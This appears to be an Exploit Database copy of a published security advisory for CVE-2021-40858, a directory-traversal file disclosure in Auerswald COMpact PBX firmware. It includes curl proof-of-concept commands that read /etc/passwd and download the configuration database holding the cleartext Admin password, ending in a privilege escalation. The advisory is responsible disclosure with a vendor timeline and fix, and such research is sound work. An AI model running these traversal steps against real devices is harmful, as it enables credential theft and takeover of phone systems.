Auerswald COMpact 8.0B – Arbitrary File Disclosure

• Exploit Database
• 120 阅读

• 作者： RedTeam Pentesting GmbH
  日期： 2021-12-06
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50568/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304

  # Exploit Title: Auerswald COMpact 8.0B - Arbitrary File Disclosure # Date: 06/12/2021 # Exploit Author: RedTeam Pentesting GmbH   Advisory: Auerswald COMpact Arbitrary File Disclosure     RedTeam Pentesting discovered a vulnerability in the web-based management interface of the Auerswald COMpact 5500R PBX which allows users with the "sub-admin" privilege to access any files on the PBX&apos;s file system.     Details =======   Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19") Affected Versions: <= 8.0B (COMpact4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)) Fixed Versions: 8.2B Vulnerability Type: Arbitrary File Disclosure Security Risk: medium Vendor URL: https://www.auerswald.de/en/product/compact-5500r Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006 Advisory Status: published CVE: CVE-2021-40858 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858     Introduction ============   "Fully modular VoIP appliance for more efficient communication processes With the COMpact 5500R, you are originally equipped for everyday business - now and in the future.   The fully modular architecture with 80 IP channels and all the functions of a large ITC server allows up to 112 subscribers and thus scales with your company.   Continuous maintanance and expansion of the system software makes this versatile IP server a future-proof investment in any business communication."   (from the vendor&apos;s homepage)     More Details ============   RedTeam Pentesting discovered that attackers with administrative access to the PBX&apos;s web-based management interface (as a so-called "sub-admin") can download arbitrary files from the PBX&apos;s file system. This includes the usually not accessible configuration database which contains the password for the highly privileged "Admin" user in clear text.     Proof of Concept ================   The command-line HTTP client curl[1] can be used to log into the management interface of the PBX with the username "sub-admin" and the password "verysecretpassword" as follows:   ------------------------------------------------------------------------ $ curl --anyauth --user sub-admin:verysecretpassword --include \ https://192.168.1.2/tree   [...] HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/ [...]   [{"login":2,"userId":2222,[...]}] ------------------------------------------------------------------------   The server returns a session ID in a cookie which is then used to check the access level:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=ERQMMDGECSGWTII&apos; --include \ https://192.168.1.2/logstatus_state   HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...]   {"logstatus":"Sub-Administrator"} ------------------------------------------------------------------------   In the PBX&apos;s user management, the access level "Sub-Administrator" is used for user accounts who should be able to configure the PBX. There are also other, higher-level access privileges.   Users with the "sub-admin" privilege can configure music on hold (MOH, "Wartemusik"), and for example listen to the currently configured music. In order to do this, the browser requests the music files from the PBX.   The file "alarm1.wav" can be accessed with curl as follows:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=ERQMMDGECSGWTII&apos; --include \ &apos;https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav&apos;\ &apos;&pageindex=1&apos;   HTTP/1.1 200 OK Content-Type: audio/x-wav; charset= Content-Length: 132192 Content-disposition: attachment; filename="alarm1.wav" [...] ------------------------------------------------------------------------   It was found that the PBX allows directory traversal with the string "../", so the file "/etc/passwd" can be accessed as follows:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=ERQMMDGECSGWTII&apos; --include \ &apos;https://192.168.1.2/wartemusik_verwaltung_play?&apos;\ &apos;fileName=../../etc/passwd&pageindex=&apos;   HTTP/1.1 200 OK [...] Content-Length: 113 Content-disposition: attachment; filename="../../etc/passwd" [...]   root::0:0:root:/root:/bin/sh netstorage::1:1::/data/ftpd:/bin/false web::2:2::/opt/auerswald/lighttpd:/bin/false ------------------------------------------------------------------------   The same issue is present in the function for managing logos. A regular request for the file "logo1.jpg" is shown below:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=ERQMMDGECSGWTII&apos; --include \ &apos;https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424&apos;   HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: image/jpg; charset=UTF-8 Content-Length: 13986 Content-disposition: attachment; filename="logo1.jpg" [...] ------------------------------------------------------------------------   In a similar fashion as before, the file "/etc/passwd" can be accessed:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=ERQMMDGECSGWTII&apos; --include \ &apos;https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd&apos;   HTTP/1.1 200 OK [...]   root::0:0:root:/root:/bin/sh netstorage::1:1::/data/ftpd:/bin/false web::2:2::/opt/auerswald/lighttpd:/bin/false ------------------------------------------------------------------------   For attackers, an interesting file is the SQLite[2] database file "/data/db/pbx4.db". It can be downloaded as follows:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=ERQMMDGECSGWTII&apos; &apos;https://&apos;\ &apos;192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db&apos; \ > pbx4.db   % Total% Received % XferdAverage Speed TimeTime TimeCurrent   DloadUpload Total SpentLeftSpeed 100512010051200 0162530 --:--:-- --:--:-- --:--:-- 16305 ------------------------------------------------------------------------   This file contains the password for the highly privileged "Admin" user account:   ------------------------------------------------------------------------ $ sqlite3 pbx4.db SQLite version 3.27.2 2019-02-25 16:06:06 Enter ".help" for usage hints.   sqlite> .tables DbFileVersionPbxMisc   sqlite> select * from PbxMisc; [...] AdminPasswdHash| AdminLogin|Admin AdminPin|43214321 AdminPasswd|S3kr1t! ------------------------------------------------------------------------   The username and password can then be used to log into the web application:   ------------------------------------------------------------------------ $ curl --user &apos;Admin:S3kr1t!&apos; --anyauth --include \ https://192.168.1.2/tree   HTTP/1.1 200 OK Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/ [...]   [{"login":3,"userId":0,"userName":"",[...]}] ------------------------------------------------------------------------   Checking the access level reveals the new privilege:   ------------------------------------------------------------------------ $ curl --cookie &apos;AUERSessionID1234123412=AJXGKBFTCIHSHAC&apos; --include \ https://192.168.1.2/logstatus_state   HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8; [...]   {"logstatus":"Administrator"} ------------------------------------------------------------------------   The user "Admin", in contrast to regular administrative users ("sub-admin"), can access more functions and for example apply firmware updates.   Workaround ==========   Disable or restrict access to the web-based management if possible.     Fix ===   Upgrade to a firmware version which corrects this vulnerability.     Security Risk =============   Attackers who already have acquired administrative access as a so-called "sub-admin" can download a database file and access the password for the highly privileged "Admin" account. This account can use more functions and is allowed to apply firmware updates.   On the one hand, exploiting this vulnerability already requires administrative access. On the other hand, attackers can reach high-privileged access to the PBX and use functions not available to "sub-admin" users, like firmware updates. All in all, this vulnerability is therefore rated to have a medium risk potential.     Timeline ========   2021-08-26 Vulnerability identified 2021-09-01 Customer approved disclosure to vendor 2021-09-10 Vendor notified 2021-09-10 CVE ID requested 2021-09-10 CVE ID assigned 2021-10-05 Vendor provides access to device with fixed firmware 2021-10-11 Vendor provides fixed firmware 2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected 2021-12-06 Advisory published     References ==========   [1] https://curl.se [2] https://www.sqlite.org     RedTeam Pentesting GmbH =======================   RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.   As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.   More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/     Working at RedTeam Pentesting =============================   RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/     -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen